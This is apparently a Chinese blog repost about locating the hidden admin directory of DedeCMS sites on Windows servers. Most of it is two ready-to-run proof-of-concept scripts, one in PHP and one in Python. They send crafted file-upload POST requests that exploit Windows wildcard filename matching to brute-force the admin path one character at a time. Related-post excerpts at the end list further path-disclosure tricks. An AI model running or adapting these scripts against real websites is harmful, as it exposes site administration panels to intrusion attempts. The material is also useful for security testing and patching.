解决DEDECMS历史难题–找后台目录

最新推荐文章于 2022-09-07 14:09:10 发布
最新推荐文章于 2022-09-07 14:09:10 发布
阅读量6.3k 收藏 1
点赞数
分类专栏: 记录
原文链接:https://xz.aliyun.com/t/2064
版权

仅针对windows系统

附原文地址:https://xz.aliyun.com/t/2064

附原理文档

poc:

<?php
$domain='http://localhost/dedecms/';
$url=$domain.'/index.php';
function post($url, $data, $cookie = '') {
    $options = array(
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_HEADER => true,
        CURLOPT_POST => true,
        CURLOPT_SSL_VERIFYHOST => false,
        CURLOPT_SSL_VERIFYHOST => false,
        CURLOPT_COOKIE => $cookie,
        CURLOPT_POSTFIELDS => $data,
    );
    $ch = curl_init($url);
    curl_setopt_array($ch, $options);
    $result = curl_exec($ch);
    curl_close($ch);
    return $result;
}
$testlen=25;
$str=range('a','z');
$number=range(0,9,1);
$dic = array_merge($str, $number);
$n=true;
$nn=true;
$path='';
while($n){
    foreach($dic as $v){
        foreach($dic as $vv){
            #echo $v.$vv .'----';
            $post_data="dopost=save&_FILES[b4dboy][tmp_name]=./$v$vv</images/admin_top_logo.gif&_FILES[b4dboy][name]=0&_FILES[b4dboy][size]=0&_FILES[b4dboy][type]=image/gif";
            $result=post($url,$post_data);
            if(strpos($result,'Upload filetype not allow !') === false){
                $path=$v.$vv;$n=false;break 2;
            }
        }
    }
}
while($nn){
    foreach($dic as $vvv){
        $post_data="dopost=save&_FILES[b4dboy][tmp_name]=./$path$vvv</images/admin_top_logo.gif&_FILES[b4dboy][name]=0&_FILES[b4dboy][size]=0&_FILES[b4dboy][type]=image/gif";
        $result=post($url,$post_data);
        if(strpos($result,'Upload filetype not allow !') === false){
            $path.=$vvv;
            echo $path . PHP_EOL;
            $giturl=$domain.'/'.$path.'/images/admin_top_logo.gif';
            if(@file_get_contents($giturl)){
                echo $domain.'/'.$path.'/';
                $nn=false;break 2;
            }
        }
    }
}
?>
#!/usr/bin/env python
#coding:utf-8
import requests
import string


login_str = string.ascii_letters+string.digits+"_#!"

headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
}

def chek_poc(v,letter):
        if v<=5.6:
                poc= {
                        "dopost":"save",
                        "_FILES[b4dboy][tmp_name]":"./%s</img/admin_top_logo.gif"%letter,
                        "_FILES[b4dboy][name]":0,
                        "_FILES[b4dboy][size]":0,
                        "_FILES[b4dboy][type]":"image/gif",
                        }
        else:
                poc= {
                "dopost":"save",
                "_FILES[b4dboy][tmp_name]":"./%s</images/admin_top_logo.gif"%letter,
                "_FILES[b4dboy][name]":0,
                "_FILES[b4dboy][size]":0,
                "_FILES[b4dboy][type]":"image/gif",
        }
        return poc

def get_login_site(version,url):
        print "Testing.............."
        web_site = ""
        flag = 0
        for l in login_str:
                for i in login_str:
                        poc = chek_poc(version,l+i)
                        print l+i
                        req = requests.post(url,headers=headers,data=poc)
                        if "Upload filetype not allow !" not in req.content and req.status_code == 200:
                                web_site = l+i
                                print "[+ %s]"%web_site
                                flag = 1
                                break
                if flag:
                        break
        for num in range(1,10):
                for u in login_str:
                        poc2 = chek_poc(version,web_site+u)
                        #print web_site+u
                        req2 = requests.post(url,headers=headers,data=poc2)
                        if "Upload filetype not allow !" not in req2.content and req2.status_code == 200:
                                web_site = web_site+u
                                print "[+ %s]"%web_site
                                break

if __name__ == '__main__':
        get_login_site('5.7',"http://127.0.0.1")

 

 

 

夜班机器人
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
管理后台UI.rar_dedecms_dedecms后台新样式_dedecms和ui
09-24
dedecms 经典样式,二次开发
杨校老师课堂之DeDeCMS织梦后台目录介绍篇
杨校的博客
05-25 1073
织梦后台目录认识 基本的目录结构  ../a 默认生成文件存放目录  ../data 系统缓存或其他可写入数据存放目录  ../dede 默认后台登录管理(可任意改名)  ../images 系统默认的部分系统需要的图片目录  ../include 程序核心系统文件目录  ../install 安装文件目录  ../member 会员系统目录  ../m 手机端系统目录  ../plus 插件及辅助功能目录  ../special 专题目录  ../templets 模版目录  ../uploads 默认
dedecms织梦日志暴露后台地址漏洞BUG修复
09-07 505
然后修改/include/common.inc.php中DEDEDATA变量,将:define('DEDEDATA', DEDEROOT.'/data');修改tplcache缓存文件目录:登陆后台 > 系统 > 系统基本参数 > 性能选项,将模板缓存目录值改为 /../data/tplcache。首先用FTP或远程登陆的方式将data/mysql_error_trace.inc更名成 mysql_error_你喜欢的任意字符.inc。通过FTP将/data/文件夹移至web根目录的上一级目录
织梦查后台方法总结
weixin_34101229的博客
11-08 1626
1. /data/mysql_error_trace.inc 2、/include/dialog/select_soft.php 3、/include/dialog/select_media.php?f=form1.murl 4,用些工具扫描后台,比如明小子、御剑、wwwscan等; 5,谷歌黑客搜索,关键字,例如:inurl: 6、/robots...
dedecms 后台总结_总结后台路径的N总思路方法
weixin_39861955的博客
12-22 1297
1,穷举猜解现往常能够暴力猜解网站后台登陆地址的软件有很多,从最早的啊D注入工具开端,不断到如今很多常用的工具(通常为SQL注入应用工具)都会带有后台登陆地址猜解的功用。当然了,这个猜解绝大局部是依据字典来的,只需字典强大,用哪个工具猜倒显得不是那么重要了。需求留意的是,要看工具猜解途径的运用原理,大局部是依据返回的头部的代码,如200,404等等,这里要特别留意一些奇葩设置网站,一切途径都会2...
[dede漏洞]dede 爆后台 路径,dede后台地址查询
热门推荐
IT技术宅-北方的刀郎
03-21 1万+
时间:2013-03-16 23:05来源:未知 作者:admin 点击:1131次http://123.42824.com/1837.html [dede漏洞]dede 爆后台 路径,dede后台地址查询 今天偶尔看到dede可以爆后台路径,具体方法是 1.include/dialog/select_soft.php文件可以爆出DEDECMS后台,以前的老板本可以跳过登陆验证直接访问,无需管理
第四课:DEDECMS程序目录后台的基础操作.avi
11-18
织梦dedecms仿站教程vip特别一版 集合实战与窍门攻略 快速进入建站专家队伍
DEDECMS5.7后台getshell1
08-03
DEDECMS5.7后台getshell1
php代码-使用代码解决解决dedecms后台卡顿的办法的源代码
05-02
——学习参考资料:仅用于个人学习使用! php代码-使用代码解决解决dedecms后台卡顿的办法的源代码
Dede后台验证码不显示三种解决方案
12-12
Dede后台验证码不显示三种解决方案,包括取出验证码验证
dede精美后台
05-06
超级好看的后台,一直留着 分享给大家,相关界面可以自己测试
DEDECMS后台目录有感
dfdhxb995397的博客
03-01 367
本文作者:红日安全团队——Mochazz 早上看了先知论坛的这篇文章:解决DEDECMS历史难题后台目录不得不说作者思路确实巧妙,作者巧妙的利用了Windows FindFirstFile和织梦程序代码中对上传图片的逻辑判断,成功在Windows环境下爆破出后台目录。可能一些人不了解Windows FindFirstFile,其实就是Windows在搜索文件时,使用到的一个win...
DedeEIMS v1.1暴后台路径
Pete很皮
01-10 934
include/dialog/config.php//检验用户登录状态$cuserLogin = new userLogin(); if($cuserLogin->getUserID()==-1) { if($cuserLogin->adminDir=='') { exit('Request Error!'); } $gurl = "../../{$cuserLogin->adminDir}/lo
dede 修改首页默认访问路径/dede修改安装目录
易天海
11-13 5485
https://jingyan.baidu.com/article/d3b74d64f269121f77e60913.html dede下载后解压了,我们安装后,发现访问首页的路径不是我们想要的怎么办呢? 这种访问 是不是很烦。我只想要www.cfi.cn后就能访问我的网站。(1) 你自己安装的时候 在 访问路径那点 自己小心的设置一下(2)  安装完了之后 自己手动去修改咯。 方法...
DedeCMS织梦网站目录创建及后台基本操作详解
测试
06-08 736
  DedeCMS织梦网站是比较流行的自助建站的一种方式,开放性使其具有很大的优势,也成为很多中小型企业及个人站长节省成本的选择。前面小编已经为大家分享了《新手搭建DEDE织梦网站的详细操作流程》,为了让大家对DedeCMS织梦网站的建设有更深层次的了解,小编今天就以本地服务器详细介绍下网站目录后台的基本操作详解。 1、网站名称与TDK的设置 (1)当我们进入网站后,在浏览器的...
dedecms后台文件技巧
cc1988429的专栏
10-12 1712
1.include/dialog/select_soft.php文件可以爆出DEDECMS后台,以前的老板本可以跳过登陆验证直接访问,无需管理 员帐号,新版本的就直接转向了后台. 2.include/dialog/config.php会爆出后台管理路径 3.include/dialog/select_soft.php?activepath=/include/FCKeditor
dedecms目录结构,非常全
beyond__devil的博客
10-12 1万+
紧接dedecms分享,目录文件单另一个文件。一个程序的目录结构的了解很重要,对一个系统的初次认识很关键: dedecms目录结构: /a:栏目静态页默认生成目录。为利于SEO优化,可以将文件指定到根目录。 /data:数据存放目录。Backupdata为数据库备份目录,网站迁移时需拷入。 /dede:默认的站点后台管理目录。为网站安全,建议更改名称 /image:系统图片存放目录
dedecms5.7内核
最新发布
12-09
值得一提的是,dedecms5.7内核还拥有强大的社区支持和开发团队,会不断更新和完善系统,解决bug和提供技术支持,给用户带来更好的体验。 综上所述,dedecms5.7内核是一个功能齐全、稳定可靠、易于使用的内容管理...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值